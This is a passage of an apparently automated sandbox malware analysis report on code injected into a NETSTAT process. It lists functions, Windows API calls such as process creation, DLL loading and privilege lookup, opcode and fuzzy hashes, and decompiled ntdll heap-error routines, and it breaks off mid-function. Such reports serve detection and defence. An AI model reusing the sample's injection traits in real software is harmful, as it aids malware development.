                control_flow_graph 243 7d9050-7d9092 call 7dbd10 246 7d916c-7d9172 243->246 247 7d9098-7d90e8 call 7dbde0 call 7cacf0 call 7d4e50 243->247 254 7d90f0-7d9101 Sleep 247->254 255 7d9166-7d916a 254->255 256 7d9103-7d9109 254->256 255->246 255->254 257 7d910b-7d9131 call 7d8c70 256->257 258 7d9133-7d9154 call 7d8e80 256->258 262 7d9159-7d915c 257->262 258->262 262->255
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 007D90F8
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: b34c0d465a51e7e09efc842e9443ab23cdcf2c180a7208150cf323320d8806fb
                • Instruction ID: 022ffc69baf781ed6573f7e7c462872938689d661a8a0329702e310792b60a89
                • Opcode Fuzzy Hash: b34c0d465a51e7e09efc842e9443ab23cdcf2c180a7208150cf323320d8806fb
                • Instruction Fuzzy Hash: 893170B2500745FBC724DF64CC89F67B7B8BB48B00F10811EFA2A5B345DA34A650CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007D9046 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 87sleepCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 263 7d9046-7d904e 264 7d8fdb-7d8fe1 263->264 265 7d9050-7d9092 call 7dbd10 263->265 268 7d916c-7d9172 265->268 269 7d9098-7d90e8 call 7dbde0 call 7cacf0 call 7d4e50 265->269 276 7d90f0-7d9101 Sleep 269->276 277 7d9166-7d916a 276->277 278 7d9103-7d9109 276->278 277->268 277->276 279 7d910b-7d9131 call 7d8c70 278->279 280 7d9133-7d9154 call 7d8e80 278->280 284 7d9159-7d915c 279->284 280->284 284->277
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 007D90F8
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: b8a0d20894dc62e7958a81d935734cab8589ee002bad3fd3e448db68ab567353
                • Instruction ID: c3605769635d5c99d9ee802f546ffacabe86c01931add3fbf05c2b2b34321b7b
                • Opcode Fuzzy Hash: b8a0d20894dc62e7958a81d935734cab8589ee002bad3fd3e448db68ab567353
                • Instruction Fuzzy Hash: AC318172A00305BBC724EF68D889B67B7B8EB48700F10815EFA1D5B345D679A550CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 302 7da640-7da671 call 7daf30 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007C3AF8), ref: 007DA66D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: .z`
                • API String ID: 3298025750-1441809116
                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction ID: 7312881595307f6bdc109c3c5e81bb04819d6a510bb55f9916bf68f89747a8a8
                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction Fuzzy Hash: 23E012B1210208ABDB18EF99CC49EA777ACEF88750F018599FA085B242C630E9108AB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 299 7da600-7da631 call 7daf30 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(6E},?,007D4CAF,007D4CAF,?,007D4536,?,?,?,?,?,00000000,00000000,?), ref: 007DA62D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: 6E}
                • API String ID: 1279760036-2082338545
                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction ID: 7b8a220ffcaff4bee4a800883d11b5779dc5a2eff304c428fefda614a59b01f4
                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction Fuzzy Hash: 80E012B1210208ABDB14EF99CC45EA777ACEF88654F118599FA085B242C630F9118AB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007C8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007C836A
                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007C838B
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                • Instruction ID: 18bb45ab6193f7622591a49feceec5cbd4831cb411592be6900e2a1c0eec03f5
                • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                • Instruction Fuzzy Hash: C7018431A80229B7E721A6949C07FBE776C5B40F51F05011DFF04BA2C1EAA8690547F6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007CACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 007CAD62
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction ID: c6c507412573bb21709702f1b1aa1b8c05fa9a209fa6b098ecb2b952b5b5a452
                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction Fuzzy Hash: BE011EB5E4020DFBDB10EAA4DC46F9DB3789B54309F0045AAAA0997641F635EB14CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA6B0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007DA704
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction ID: af4365ecee4ca2e7864200afeb1c549e9129f2896b49f7b19cc05b05be8fe3f0
                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction Fuzzy Hash: 6E01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA6AD Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007DA704
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 2b05a09e3c50a4ca40192954c48c2de2ebf7f7a2eb55a46449b6669d8ff8ba56
                • Instruction ID: be0a070001297f5f214f35aa0e4d2a1880b1fc4f7f9b8f30171b851baa6ac9b5
                • Opcode Fuzzy Hash: 2b05a09e3c50a4ca40192954c48c2de2ebf7f7a2eb55a46449b6669d8ff8ba56
                • Instruction Fuzzy Hash: 1001F2B2215109BFCB44DF88DC80DEB7BB9AF8C314F158258FA5997205C630E851CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007D9180 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,007CF050,?,?,00000000), ref: 007D91BC
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 88443eb0ee72a2f98bcfdb8adc4b35d91a5b470e417f6c8a54e1f74412ecdaae
                • Instruction ID: f264941bb0fc72b321d20411b4d822a4ae09ebae42ebe4d5edb60c8cad606f3d
                • Opcode Fuzzy Hash: 88443eb0ee72a2f98bcfdb8adc4b35d91a5b470e417f6c8a54e1f74412ecdaae
                • Instruction Fuzzy Hash: FEE06D333802047AE2206599AC02FA7B3AC9B81B20F140026FA0DEB2C1D59AF80142A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007CF6C7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,007C8D14,?), ref: 007CF6FB
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: a1d6d8215c0178793dee70496e8379bfbcda511b055425cecd44daa52295f724
                • Instruction ID: d8ad697b21f74c6390e922a9be84c6f2ca562a4fd528d21011f223f4cedc26df
                • Opcode Fuzzy Hash: a1d6d8215c0178793dee70496e8379bfbcda511b055425cecd44daa52295f724
                • Instruction Fuzzy Hash: 79E0C2316802053EEB11EBB49C53FB93BA65B65784F0D00B8F58DE73D3E965D0018620
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,007CF1D2,007CF1D2,?,00000000,?,?), ref: 007DA7D0
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction ID: 7969a92f9330b58734159d53ed67bf2999396720e4b5e6bd63550209cf5c2aa0
                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction Fuzzy Hash: 1BE01AB1610208ABDB10DF49CC85EE737ADEF88650F018155FA0857241C934E8118BF5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007CF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,007C8D14,?), ref: 007CF6FB
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                • Instruction ID: 24ea9ca40830f58452b75ed135a5edebe5a7d9de0d7f45eea015eb823db58809
                • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                • Instruction Fuzzy Hash: D8D05E616503083BE710AAA4DC07F2633896B44B00F490068F948A63C3D964E4004165
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0339967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                • Instruction ID: 4cc251b976045ee1f59c70f1e13a799a76af6b9e7dc4da638bf6b4966d8c0fa4
                • Opcode Fuzzy Hash: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                • Instruction Fuzzy Hash: 88B09B719014C5D5EA11D7654A487177904B7D0751F56C0A6D1020681A4778C091F5B5
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 0340B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0340B314
                • The resource is owned shared by %d threads, xrefs: 0340B37E
                • *** enter .exr %p for the exception record, xrefs: 0340B4F1
                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0340B476
                • The critical section is owned by thread %p., xrefs: 0340B3B9
                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0340B2DC
                • *** Resource timeout (%p) in %ws:%s, xrefs: 0340B352
                • *** then kb to get the faulting stack, xrefs: 0340B51C
                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0340B39B
                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0340B3D6
                • The resource is owned exclusively by thread %p, xrefs: 0340B374
                • *** An Access Violation occurred in %ws:%s, xrefs: 0340B48F
                • *** Inpage error in %ws:%s, xrefs: 0340B418
                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0340B38F
                • *** enter .cxr %p for the context, xrefs: 0340B50D
                • a NULL pointer, xrefs: 0340B4E0
                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0340B2F3
                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0340B47D
                • <unknown>, xrefs: 0340B27E, 0340B2D1, 0340B350, 0340B399, 0340B417, 0340B48E
                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0340B305
                • an invalid address, %p, xrefs: 0340B4CF
                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0340B53F
                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0340B484
                • The instruction at %p referenced memory at %p., xrefs: 0340B432
                • Go determine why that thread has not released the critical section., xrefs: 0340B3C5
                • read from, xrefs: 0340B4AD, 0340B4B2
                • write to, xrefs: 0340B4A6
                • The instruction at %p tried to %s , xrefs: 0340B4B6
                • This failed because of error %Ix., xrefs: 0340B446
                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0340B323
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                • API String ID: 0-108210295
                • Opcode ID: 83acd9c9a9624f63ebb04bbbf4c1974f9f5e77e919ac1b3775f9c8a620339a74
                • Instruction ID: 45f2c7ad7c67739fa68fa6da085a322ad2d8311634d896faab471cbc23ee3041
                • Opcode Fuzzy Hash: 83acd9c9a9624f63ebb04bbbf4c1974f9f5e77e919ac1b3775f9c8a620339a74
                • Instruction Fuzzy Hash: 6A813379B40220FFDB21EB148CC5D2F3B65EF47A59B0440A6F4241F293D2B1D512DABA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03411C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                Download Yara Rule
                C-Code - Quality: 44%
                			E03411C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x33348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0335B150();
				} else {
					E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x344589c);
				E0335B150("Heap error detected at %p (heap handle %p)\n",  *0x34458a0);
				_t27 =  *0x3445898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03411E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0335B150();
				} else {
					E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0335B150("Error code: %d - %s\n",  *0x3445898);
				_t113 =  *0x34458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0335B150();
					} else {
						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0335B150("Parameter1: %p\n",  *0x34458a4);
				}
				_t115 =  *0x34458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0335B150();
					} else {
						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0335B150("Parameter2: %p\n",  *0x34458a8);
				}
				_t117 =  *0x34458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0335B150();
					} else {
						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0335B150("Parameter3: %p\n",  *0x34458ac);
				}
				_t119 =  *0x34458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0335B150();
					} else {
						E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x34458b4);
					E0335B150("Last known valid blocks: before - %p, after - %p\n",  *0x34458b0);
				} else {
					_t120 =  *0x34458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0335B150();
				} else {
					E0335B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0335B150("Stack trace available at %p\n", 0x34458c0);
			}











                0x03411c10
                0x03411c16
                0x03411c1e
                0x03411c3d
                0x03411c3e
                0x03411c20
                0x03411c35
                0x03411c3a
                0x03411c44
                0x03411c55
                0x03411c5a
                0x03411c65
                0x03411c67
                0x00000000
                0x03411c6e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x03411c67
                0x03411cdc
                0x03411ce5
                0x03411d04
                0x03411d05
                0x03411ce7
                0x03411cfc
                0x03411d01
                0x03411d0b
                0x03411d17
                0x03411d1f
                0x03411d25
                0x03411d30
                0x03411d4f
                0x03411d50
                0x03411d32
                0x03411d47
                0x03411d4c
                0x03411d61
                0x03411d67
                0x03411d68
                0x03411d6e
                0x03411d79
                0x03411d98
                0x03411d99
                0x03411d7b
                0x03411d90
                0x03411d95
                0x03411daa
                0x03411db0
                0x03411db1
                0x03411db7
                0x03411dc2
                0x03411de1
                0x03411de2
                0x03411dc4
                0x03411dd9
                0x03411dde
                0x03411df3
                0x03411df9
                0x03411dfa
                0x03411e00
                0x03411e0a
                0x03411e13
                0x03411e32
                0x03411e33
                0x03411e15
                0x03411e2a
                0x03411e2f
                0x03411e39
                0x03411e4a
                0x03411e02
                0x03411e02
                0x03411e08
                0x00000000
                0x00000000
                0x03411e08
                0x03411e5b
                0x03411e7a
                0x03411e7b
                0x03411e5d
                0x03411e72
                0x03411e77
                0x03411e95

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                • API String ID: 0-2897834094
                • Opcode ID: 5e5188e05857b7993c8fe4c81d2b165e5b2b491a403b975d7d6d1e46046112b7
                • Instruction ID: 7014cd31e7816ea682d1684cc2f220aa0e0a6759b30dc443a7074fbc2a0be56a
                • Opcode Fuzzy Hash: 5e5188e05857b7993c8fe4c81d2b165e5b2b491a403b975d7d6d1e46046112b7
                • Instruction Fuzzy Hash: 3861D63A921A44DFCA51EB94D4C6D25B3E4FB05930B0980BFFA1A6F341D634AC618E4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03363D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E03363D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03361B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03361B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03361B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03361B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03361B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
